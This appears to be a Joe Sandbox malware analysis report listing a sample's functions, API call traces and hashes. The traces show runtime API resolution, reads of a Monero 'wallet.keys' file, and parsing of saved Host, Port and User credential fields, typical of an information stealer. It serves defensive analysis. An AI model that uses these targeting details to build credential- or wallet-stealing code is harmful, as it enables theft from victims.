Function 00B97850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B811B7), ref: 00B97880
RtlAllocateHeap.NTDLL(00000000), ref: 00B97887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B9789F

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 91196c7a06f0352e98be6e4f55d0d4a8f370bcbe337049265f56d2b773d2c96a
Instruction ID: 5fa1c16abee70fed6c730f2fa01d14242b01af87bb69e726bebf4a8f339cdefa
Opcode Fuzzy Hash: 91196c7a06f0352e98be6e4f55d0d4a8f370bcbe337049265f56d2b773d2c96a
Instruction Fuzzy Hash: 6FF044B1944209ABCB00DF99DD49FAEBBF8FB04715F10025AF605E2780C77415048BA1

Function 00B81160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00B8116A
ExitProcess.KERNEL32 ref: 00B8117E

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 556a9abcdbdd6cd05badd8db9503b5f83d8688912a53bc3e8652289e8de22199
Instruction ID: 6062ca466499de073174c9c7729e80b41714de81575726100b7558cc26522fe0
Opcode Fuzzy Hash: 556a9abcdbdd6cd05badd8db9503b5f83d8688912a53bc3e8652289e8de22199
Instruction Fuzzy Hash: ADD0177490030E9BCB00ABA4988DA9DBBB8FB08215F000594E905A2380EA305482CAA6

Function 00B99C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01325930), ref: 00B99C2D
GetProcAddress.KERNEL32(74DD0000,01325970), ref: 00B99C45
GetProcAddress.KERNEL32(74DD0000,013395E0), ref: 00B99C5E
GetProcAddress.KERNEL32(74DD0000,01339580), ref: 00B99C76
GetProcAddress.KERNEL32(74DD0000,01339628), ref: 00B99C8E
GetProcAddress.KERNEL32(74DD0000,013395C8), ref: 00B99CA7
GetProcAddress.KERNEL32(74DD0000,0132B9D0), ref: 00B99CBF
GetProcAddress.KERNEL32(74DD0000,0133CE50), ref: 00B99CD7
GetProcAddress.KERNEL32(74DD0000,0133CE08), ref: 00B99CF0
GetProcAddress.KERNEL32(74DD0000,0133CE68), ref: 00B99D08
GetProcAddress.KERNEL32(74DD0000,0133CE80), ref: 00B99D20
GetProcAddress.KERNEL32(74DD0000,01325950), ref: 00B99D39
GetProcAddress.KERNEL32(74DD0000,01325990), ref: 00B99D51
GetProcAddress.KERNEL32(74DD0000,01325850), ref: 00B99D69
GetProcAddress.KERNEL32(74DD0000,01325690), ref: 00B99D82
GetProcAddress.KERNEL32(74DD0000,0133CF40), ref: 00B99D9A
GetProcAddress.KERNEL32(74DD0000,0133CF70), ref: 00B99DB2
GetProcAddress.KERNEL32(74DD0000,0132B890), ref: 00B99DCB
GetProcAddress.KERNEL32(74DD0000,013256B0), ref: 00B99DE3
GetProcAddress.KERNEL32(74DD0000,0133D030), ref: 00B99DFB
GetProcAddress.KERNEL32(74DD0000,0133CFB8), ref: 00B99E14
GetProcAddress.KERNEL32(74DD0000,0133CDD8), ref: 00B99E2C
GetProcAddress.KERNEL32(74DD0000,0133CDF0), ref: 00B99E44
GetProcAddress.KERNEL32(74DD0000,013256D0), ref: 00B99E5D
GetProcAddress.KERNEL32(74DD0000,0133CFA0), ref: 00B99E75
GetProcAddress.KERNEL32(74DD0000,0133CE20), ref: 00B99E8D
GetProcAddress.KERNEL32(74DD0000,0133D0C0), ref: 00B99EA6
GetProcAddress.KERNEL32(74DD0000,0133CF10), ref: 00B99EBE
GetProcAddress.KERNEL32(74DD0000,0133D060), ref: 00B99ED6
GetProcAddress.KERNEL32(74DD0000,0133CEC8), ref: 00B99EEF
GetProcAddress.KERNEL32(74DD0000,0133D078), ref: 00B99F07
GetProcAddress.KERNEL32(74DD0000,0133CEF8), ref: 00B99F1F
GetProcAddress.KERNEL32(74DD0000,0133D090), ref: 00B99F38
GetProcAddress.KERNEL32(74DD0000,0133A430), ref: 00B99F50
GetProcAddress.KERNEL32(74DD0000,0133CF28), ref: 00B99F68
GetProcAddress.KERNEL32(74DD0000,0133CF58), ref: 00B99F81
GetProcAddress.KERNEL32(74DD0000,01325790), ref: 00B99F99
GetProcAddress.KERNEL32(74DD0000,0133CE38), ref: 00B99FB1
GetProcAddress.KERNEL32(74DD0000,013252D0), ref: 00B99FCA
GetProcAddress.KERNEL32(74DD0000,0133CF88), ref: 00B99FE2
GetProcAddress.KERNEL32(74DD0000,0133CEE0), ref: 00B99FFA
GetProcAddress.KERNEL32(74DD0000,013252F0), ref: 00B9A013
GetProcAddress.KERNEL32(74DD0000,01325510), ref: 00B9A02B
LoadLibraryA.KERNEL32(0133CE98,?,00B95CA3,00BA0AEB,?,?,?,?,?,?,?,?,?,?,00BA0AEA,00BA0AE3), ref: 00B9A03D
LoadLibraryA.KERNEL32(0133CEB0,?,00B95CA3,00BA0AEB,?,?,?,?,?,?,?,?,?,?,00BA0AEA,00BA0AE3), ref: 00B9A04E
LoadLibraryA.KERNEL32(0133CFD0,?,00B95CA3,00BA0AEB,?,?,?,?,?,?,?,?,?,?,00BA0AEA,00BA0AE3), ref: 00B9A060
LoadLibraryA.KERNEL32(0133CFE8,?,00B95CA3,00BA0AEB,?,?,?,?,?,?,?,?,?,?,00BA0AEA,00BA0AE3), ref: 00B9A072
LoadLibraryA.KERNEL32(0133D048,?,00B95CA3,00BA0AEB,?,?,?,?,?,?,?,?,?,?,00BA0AEA,00BA0AE3), ref: 00B9A083
LoadLibraryA.KERNEL32(0133D000,?,00B95CA3,00BA0AEB,?,?,?,?,?,?,?,?,?,?,00BA0AEA,00BA0AE3), ref: 00B9A095
LoadLibraryA.KERNEL32(0133D018,?,00B95CA3,00BA0AEB,?,?,?,?,?,?,?,?,?,?,00BA0AEA,00BA0AE3), ref: 00B9A0A7
LoadLibraryA.KERNEL32(0133D0A8,?,00B95CA3,00BA0AEB,?,?,?,?,?,?,?,?,?,?,00BA0AEA,00BA0AE3), ref: 00B9A0B8
GetProcAddress.KERNEL32(75290000,01325230), ref: 00B9A0DA
GetProcAddress.KERNEL32(75290000,0133D1F8), ref: 00B9A0F2
GetProcAddress.KERNEL32(75290000,013391E0), ref: 00B9A10A
GetProcAddress.KERNEL32(75290000,0133D2A0), ref: 00B9A123
GetProcAddress.KERNEL32(75290000,013253F0), ref: 00B9A13B
GetProcAddress.KERNEL32(6FC70000,0132BA98), ref: 00B9A160
GetProcAddress.KERNEL32(6FC70000,01325350), ref: 00B9A179
GetProcAddress.KERNEL32(6FC70000,0132B9A8), ref: 00B9A191
GetProcAddress.KERNEL32(6FC70000,0133D318), ref: 00B9A1A9
GetProcAddress.KERNEL32(6FC70000,0133D1E0), ref: 00B9A1C2
GetProcAddress.KERNEL32(6FC70000,01325550), ref: 00B9A1DA
GetProcAddress.KERNEL32(6FC70000,01325390), ref: 00B9A1F2
GetProcAddress.KERNEL32(6FC70000,0133D2B8), ref: 00B9A20B
GetProcAddress.KERNEL32(752C0000,013253D0), ref: 00B9A22C
GetProcAddress.KERNEL32(752C0000,013254F0), ref: 00B9A244
GetProcAddress.KERNEL32(752C0000,0133D288), ref: 00B9A25D
GetProcAddress.KERNEL32(752C0000,0133D168), ref: 00B9A275
GetProcAddress.KERNEL32(752C0000,01325430), ref: 00B9A28D
GetProcAddress.KERNEL32(74EC0000,0132BAC0), ref: 00B9A2B3
GetProcAddress.KERNEL32(74EC0000,0132BB38), ref: 00B9A2CB
GetProcAddress.KERNEL32(74EC0000,0133D150), ref: 00B9A2E3
GetProcAddress.KERNEL32(74EC0000,01325290), ref: 00B9A2FC
GetProcAddress.KERNEL32(74EC0000,013254B0), ref: 00B9A314
GetProcAddress.KERNEL32(74EC0000,0132B750), ref: 00B9A32C
GetProcAddress.KERNEL32(75BD0000,0133D228), ref: 00B9A352
GetProcAddress.KERNEL32(75BD0000,01325470), ref: 00B9A36A
GetProcAddress.KERNEL32(75BD0000,013390A0), ref: 00B9A382
GetProcAddress.KERNEL32(75BD0000,0133D0F0), ref: 00B9A39B
GetProcAddress.KERNEL32(75BD0000,0133D210), ref: 00B9A3B3
GetProcAddress.KERNEL32(75BD0000,01325210), ref: 00B9A3CB
GetProcAddress.KERNEL32(75BD0000,013255F0), ref: 00B9A3E4
GetProcAddress.KERNEL32(75BD0000,0133D2D0), ref: 00B9A3FC
GetProcAddress.KERNEL32(75BD0000,0133D0D8), ref: 00B9A414
GetProcAddress.KERNEL32(75A70000,01325530), ref: 00B9A436
GetProcAddress.KERNEL32(75A70000,0133D138), ref: 00B9A44E
GetProcAddress.KERNEL32(75A70000,0133D390), ref: 00B9A466
GetProcAddress.KERNEL32(75A70000,0133D330), ref: 00B9A47F
GetProcAddress.KERNEL32(75A70000,0133D2E8), ref: 00B9A497
GetProcAddress.KERNEL32(75450000,01325250), ref: 00B9A4B8
GetProcAddress.KERNEL32(75450000,01325270), ref: 00B9A4D1
GetProcAddress.KERNEL32(75DA0000,013255D0), ref: 00B9A4F2
GetProcAddress.KERNEL32(75DA0000,0133D378), ref: 00B9A50A
GetProcAddress.KERNEL32(6F070000,01325450), ref: 00B9A530
GetProcAddress.KERNEL32(6F070000,01325310), ref: 00B9A548
GetProcAddress.KERNEL32(6F070000,01325410), ref: 00B9A560
GetProcAddress.KERNEL32(6F070000,0133D3A8), ref: 00B9A579
GetProcAddress.KERNEL32(6F070000,01325370), ref: 00B9A591
GetProcAddress.KERNEL32(6F070000,01325590), ref: 00B9A5A9
GetProcAddress.KERNEL32(6F070000,013252B0), ref: 00B9A5C2
GetProcAddress.KERNEL32(6F070000,01325490), ref: 00B9A5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00B9A5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00B9A607
GetProcAddress.KERNEL32(75AF0000,0133D348), ref: 00B9A629
GetProcAddress.KERNEL32(75AF0000,01339170), ref: 00B9A641
GetProcAddress.KERNEL32(75AF0000,0133D108), ref: 00B9A659
GetProcAddress.KERNEL32(75AF0000,0133D300), ref: 00B9A672
GetProcAddress.KERNEL32(75D90000,013254D0), ref: 00B9A693
GetProcAddress.KERNEL32(6CFB0000,0133D3C0), ref: 00B9A6B4
GetProcAddress.KERNEL32(6CFB0000,01325330), ref: 00B9A6CD
GetProcAddress.KERNEL32(6CFB0000,0133D360), ref: 00B9A6E5
GetProcAddress.KERNEL32(6CFB0000,0133D120), ref: 00B9A6FD

Strings

InternetSetOptionA, xrefs: 00B9A5E5
HttpQueryInfoA, xrefs: 00B9A5FC

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 482b20a28b46fe7b759003ca752a9c6e19092b9289f2b4b9787704f4edba19ca
Instruction ID: 5011533e661c8f8988c97a81d6ad664abf36aac325a0688bfcf6dad9fc67b63d
Opcode Fuzzy Hash: 482b20a28b46fe7b759003ca752a9c6e19092b9289f2b4b9787704f4edba19ca
Instruction Fuzzy Hash: 296229B551030BAFC344DFACED88D663BF9FB8C209714851AE609C33A4D6399852DB76

Function 00B87710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B87724
RtlAllocateHeap.NTDLL(00000000), ref: 00B8772B
lstrcat.KERNEL32(?,01339CC8), ref: 00B878DB
lstrcat.KERNEL32(?,?), ref: 00B878EF
lstrcat.KERNEL32(?,?), ref: 00B87903
lstrcat.KERNEL32(?,?), ref: 00B87917
lstrcat.KERNEL32(?,0133E3E8), ref: 00B8792B
lstrcat.KERNEL32(?,0133E418), ref: 00B8793F
lstrcat.KERNEL32(?,0133E4D8), ref: 00B87952
lstrcat.KERNEL32(?,0133E478), ref: 00B87966
lstrcat.KERNEL32(?,01339D50), ref: 00B8797A
lstrcat.KERNEL32(?,?), ref: 00B8798E
lstrcat.KERNEL32(?,?), ref: 00B879A2
lstrcat.KERNEL32(?,?), ref: 00B879B6
lstrcat.KERNEL32(?,0133E3E8), ref: 00B879C9
lstrcat.KERNEL32(?,0133E418), ref: 00B879DD
lstrcat.KERNEL32(?,0133E4D8), ref: 00B879F1
lstrcat.KERNEL32(?,0133E478), ref: 00B87A04
lstrcat.KERNEL32(?,01339DB8), ref: 00B87A18
lstrcat.KERNEL32(?,?), ref: 00B87A2C
lstrcat.KERNEL32(?,?), ref: 00B87A40
lstrcat.KERNEL32(?,?), ref: 00B87A54
lstrcat.KERNEL32(?,0133E3E8), ref: 00B87A68
lstrcat.KERNEL32(?,0133E418), ref: 00B87A7B
lstrcat.KERNEL32(?,0133E4D8), ref: 00B87A8F
lstrcat.KERNEL32(?,0133E478), ref: 00B87AA3
lstrcat.KERNEL32(?,0133E5C0), ref: 00B87AB6
lstrcat.KERNEL32(?,?), ref: 00B87ACA
lstrcat.KERNEL32(?,?), ref: 00B87ADE
lstrcat.KERNEL32(?,?), ref: 00B87AF2
lstrcat.KERNEL32(?,0133E3E8), ref: 00B87B06
lstrcat.KERNEL32(?,0133E418), ref: 00B87B1A
lstrcat.KERNEL32(?,0133E4D8), ref: 00B87B2D
lstrcat.KERNEL32(?,0133E478), ref: 00B87B41
lstrcat.KERNEL32(?,0133E628), ref: 00B87B55
lstrcat.KERNEL32(?,?), ref: 00B87B69
lstrcat.KERNEL32(?,?), ref: 00B87B7D
lstrcat.KERNEL32(?,?), ref: 00B87B91
lstrcat.KERNEL32(?,0133E3E8), ref: 00B87BA4
lstrcat.KERNEL32(?,0133E418), ref: 00B87BB8
lstrcat.KERNEL32(?,0133E4D8), ref: 00B87BCC
lstrcat.KERNEL32(?,0133E478), ref: 00B87BDF
lstrcat.KERNEL32(?,0133E690), ref: 00B87BF3
lstrcat.KERNEL32(?,?), ref: 00B87C07
lstrcat.KERNEL32(?,?), ref: 00B87C1B
lstrcat.KERNEL32(?,?), ref: 00B87C2F
lstrcat.KERNEL32(?,0133E3E8), ref: 00B87C43
lstrcat.KERNEL32(?,0133E418), ref: 00B87C56
lstrcat.KERNEL32(?,0133E4D8), ref: 00B87C6A
lstrcat.KERNEL32(?,0133E478), ref: 00B87C7E

Part of subcall function 00B875D0: lstrcat.KERNEL32(2FA07020,00BA17FC), ref: 00B87606
Part of subcall function 00B875D0: lstrcat.KERNEL32(2FA07020,00000000), ref: 00B87648
Part of subcall function 00B875D0: lstrcat.KERNEL32(2FA07020, : ), ref: 00B8765A
Part of subcall function 00B875D0: lstrcat.KERNEL32(2FA07020,00000000), ref: 00B8768F
Part of subcall function 00B875D0: lstrcat.KERNEL32(2FA07020,00BA1804), ref: 00B876A0
Part of subcall function 00B875D0: lstrcat.KERNEL32(2FA07020,00000000), ref: 00B876D3
Part of subcall function 00B875D0: lstrcat.KERNEL32(2FA07020,00BA1808), ref: 00B876ED
Part of subcall function 00B875D0: task.LIBCPMTD ref: 00B876FB

lstrcat.KERNEL32(?,0133E8F8), ref: 00B87E0B
lstrcat.KERNEL32(?,0133D960), ref: 00B87E1E
lstrlen.KERNEL32(2FA07020), ref: 00B87E2B
lstrlen.KERNEL32(2FA07020), ref: 00B87E3B

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 39418268a6e088d5fe23d9510a4ba76ba52c500138f24c9741ca7cf0e6ae2781
Instruction ID: 09f94eb668f9bb8860700b4c79dedecf9749e0e9b65e2bdf07c4652b4bef466c
Opcode Fuzzy Hash: 39418268a6e088d5fe23d9510a4ba76ba52c500138f24c9741ca7cf0e6ae2781
Instruction Fuzzy Hash: EB321EB280031AABCB15EBA4DC85DEA737CBB44704F044AD8F219E2191EE75E785CF61

Function 00B90250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B98E0B

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B899EC
Part of subcall function 00B899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B89A11
Part of subcall function 00B899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B89A31
Part of subcall function 00B899C0: ReadFile.KERNEL32(000000FF,?,00000000,00B8148F,00000000), ref: 00B89A5A
Part of subcall function 00B899C0: LocalFree.KERNEL32(00B8148F), ref: 00B89A90
Part of subcall function 00B899C0: CloseHandle.KERNEL32(000000FF), ref: 00B89A9A

Part of subcall function 00B98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B98E52

GetProcessHeap.KERNEL32(00000000,000F423F,00BA0DBA,00BA0DB7,00BA0DB6,00BA0DB3), ref: 00B90362
RtlAllocateHeap.NTDLL(00000000), ref: 00B90369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00B90385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BA0DB2), ref: 00B90393
StrStrA.SHLWAPI(00000000,<Port>), ref: 00B903CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BA0DB2), ref: 00B903DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00B90419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BA0DB2), ref: 00B90427
